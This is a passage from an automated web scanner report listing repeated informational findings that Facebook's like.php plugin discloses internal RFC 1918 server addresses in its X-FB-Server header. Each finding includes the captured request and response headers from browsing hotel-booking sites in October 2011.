Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.181.32
X-Cnection: close
Date: Mon, 03 Oct 2011 00:28:37 GMT
Content-Length: 31004

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
23.94. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1fc75419c%26origin%3Dhttp%253A%252F%252Fwww.orbitz.com%252Ffcc6369f4%26relation%3Dparent.parent%26transport%3Dpostmessage&extended_social_context=false&href=http%3A%2F%2Fwww.facebook.com%2FOrbitz&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.orbitz.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.132.38
X-Cnection: close
Date: Mon, 03 Oct 2011 00:07:25 GMT
Content-Length: 25790

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
23.95. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=www.facebook.com/bookingcom&layout=button_count&show_faces=false&font=arial&action=like&colorscheme=light&locale=en_US&ref=socnet_fb_og_h HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.booking.com/hotel/us/copley-square.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin=2011-10-04;checkout=2011-10-07;srfid=d7dea8120903ba76c86df3f7d5812996X1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.128.42
X-Cnection: close
Date: Mon, 03 Oct 2011 00:14:33 GMT
Content-Length: 23587

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
23.96. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1c445b22c%26origin%3Dhttp%253A%252F%252Fwww.orbitz.com%252Ff11f1d4304%26relation%3Dparent.parent%26transport%3Dpostmessage&extended_social_context=false&href=http%3A%2F%2Fwww.facebook.com%2FOrbitz&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.orbitz.com/App/ViewFlightSearchResults?retrieveParams=true&z=115e&r=84x&z=115f&r=84y&lastPage=interstitial
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.217.102
X-Cnection: close
Date: Mon, 03 Oct 2011 00:37:26 GMT
Content-Length: 25874

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
23.97. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3612be91c%26origin%3Dhttp%253A%252F%252Fwww.orbitz.com%252Ff3aab797f%26relation%3Dparent.parent%26transport%3Dpostmessage&extended_social_context=false&href=http%3A%2F%2Fwww.orbitz.com%2Fhotels%2Fh10417%2F&layout=button_count&locale=en_US&node_type=link&sdk=joey&send=true&show_faces=false&width=200 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.orbitz.com/shop/hotelsearch?type=hotel&hotel.keyword.key=Boston%2CUnited%20States&hotel.rooms[0].adlts=1&hotel.type=keyword&hotel.chkin=10/04/11&hotel.chkout=10/07/11&search=Search&WT.mc_ev=click&WT.mc_id=o_igo_merch_city_dated&gcid=C11287x600-CYBoston,United%20States&lpid=plhot&hsv.showDetails=true&hotel.hid=10417&hotel.hkey=10417_null_null_null_A1:0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.210.60
X-Cnection: close
Date: Mon, 03 Oct 2011 00:27:24 GMT
Content-Length: 30328

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
23.98. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?api_key=158327657537972&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df681ba31%26origin%3Dhttp%253A%252F%252Fwww.hotels.com%252Ff2f34f73a%26relation%3Dparent.parent%26transport%3Dpostmessage&extended_social_context=false&href=www.hotels.com%2Fho109368%2Fboston-omni-parker-house-hotel-boston-united-states%2F&layout=button_count&locale=en_US&node_type=link&sdk=joey&send=true&show_faces=false&width=160 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotels.com/hotel/details.html?pa=1&pn=1&ps=1&tab=description&destinationId=1643195&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.210.39
X-Cnection: close
Date: Mon, 03 Oct 2011 00:28:26 GMT
Content-Length: 31298

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
23.99. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfc164f6f4%26origin%3Dhttp%253A%252F%252Fwww.orbitz.com%252Ff9d35ebc4%26relation%3Dparent.parent%26transport%3Dpostmessage&extended_social_context=false&href=http%3A%2F%2Fwww.facebook.com%2FOrbitz&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.orbitz.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.146.33
X-Cnection: close
Date: Mon, 03 Oct 2011 00:33:56 GMT
Content-Length: 25789

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
23.100. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=www.facebook.com%2Fexpedia&layout=button_count&show_faces=false&width=90&action=like&colorscheme=light&height=21&ref=header HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.expedia.com/Boston-Hotels-The-Boston-Park-Plaza-Hotel-Towers.h4215.Hotel-Information?chkin=10%2F04%2F2011&chkout=10%2F07%2F2011&rm1=a1&hwrqCacheKey=ccf4a420-af8b-480f-8413-efb42e880287HWRQ&hashTag=roomsAndRates&rfrr=-5517&c=d20f4232-e339-420a-bcb4-97cad88f9b0f&&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.168.53
X-Cnection: close
Date: Mon, 03 Oct 2011 00:13:38 GMT
Content-Length: 23546

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
23.101. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.booking.com%2Fhotel%2Fus%2Fc-boston-massachusettes.html&layout=standard&show_faces=false&font=arial&action=like&colorscheme=light&locale=en_US&ref=socnet_fb_og_h HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.booking.com/hotel/us/c-boston-massachusettes.html?aid=323804&label=hotel-59554&utm_source=tripad&utm_medium=SPPC&utm_content=text-cr&utm_term=hotel-59554&do_availability_check=on&checkin_monthday=14&checkin_year_month=2011-10&checkout_monthday=16&checkout_year_month=2011-10&lang=en
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS; lsd=xyVNA

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.84.44
X-Cnection: close
Date: Mon, 03 Oct 2011 01:02:37 GMT
Content-Length: 26364

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
23.102. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1826314c4%26origin%3Dhttp%253A%252F%252Fwww.orbitz.com%252Ff27211de94%26relation%3Dparent.parent%26transport%3Dpostmessage&extended_social_context=false&href=http%3A%2F%2Fwww.facebook.com%2FOrbitz&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.orbitz.com/App/SubmitQuickSearch?z=dc61&r=39i
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.155.75
X-Cnection: close
Date: Mon, 03 Oct 2011 00:35:51 GMT
Content-Length: 25826

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
23.103. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?api_key=141597515880090&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df349c46d4%26origin%3Dhttp%253A%252F%252Fwww.expedia.com%252Ff34dd476e4%26relation%3Dparent.parent%26transport%3Dpostmessage&extended_social_context=false&font=arial&href=http%3A%2F%2Fwww.expedia.com%2FBoston-Hotels-The-Boston-Park-Plaza-Hotel-Towers.h4215.Hotel-Information%3Folacid%3Dhotel.brand.facebook.like&layout=button_count&locale=en_US&node_type=link&sdk=joey&send=true&show_faces=false&width=150 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.expedia.com/Boston-Hotels-The-Boston-Park-Plaza-Hotel-Towers.h4215.Hotel-Information?chkin=10%2F04%2F2011&chkout=10%2F07%2F2011&rm1=a1&hwrqCacheKey=ccf4a420-af8b-480f-8413-efb42e880287HWRQ&hashTag=roomsAndRates&rfrr=-5517&c=d20f4232-e339-420a-bcb4-97cad88f9b0f&&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.156.49
X-Cnection: close
Date: Mon, 03 Oct 2011 00:15:28 GMT
Content-Length: 31485

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
23.104. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df162ece9ac%26origin%3Dhttp%253A%252F%252Fwww.hotelplanner.com%252Ff2555de2ec%26relation%3Dparent.parent%26transport%3Dpostmessage&extended_social_context=false&href=www.facebook.com%2Fhotelplanner&layout=button_count&locale=en_US&node_type=link&sdk=joey&send=true&show_faces=false&width=150 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Search/index.cfm?City=Boston%2C+MA&InDate=10%2F4%2F2011&OutDate=10%2F7%2F2011&NumRooms=1&ViewType=List&HotelName=&Rating=&PriceMin=1&PriceMax=9999&btnGo.x=113&btnGo.y=15
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.165.56
X-Cnection: close
Date: Mon, 03 Oct 2011 00:13:45 GMT
Content-Length: 31042

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
23.105. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?locale=en_US&href=http://hublotnation.com/2011/09/23/hublot-watchesa-look-at-the-king-power-dwayne-wade/&layout=button_count&show_faces=false&width=100&action=like&font=verdana&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://hublotnation.com/2011/09/23/hublot-watchesa-look-at-the-king-power-dwayne-wade/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.147.44
X-Cnection: close
Date: Mon, 03 Oct 2011 00:03:33 GMT
Content-Length: 23445

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
23.106. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2Fhotelplanner&layout=button_count&show_faces=false&width=46&action=like&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Search/Index.cfm?City=Boston&InDate=10/04/2011&OutDate=10/07/2011&NumRooms=1&adults=1&State=Massachusetts&Country=United%20States&sc=IGoUGo
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.192.34
X-Cnection: close
Date: Mon, 03 Oct 2011 00:09:23 GMT
Content-Length: 23451

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
23.107. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2Fhotelplanner&layout=button_count&show_faces=false&width=46&action=like&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Search/Index.cfm?City=+&InDate=10/09/2011&OutDate=10/16/2011&NumRooms=1&sc=Away
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.51.129
X-Cnection: close
Date: Mon, 03 Oct 2011 00:37:39 GMT
Content-Length: 23393

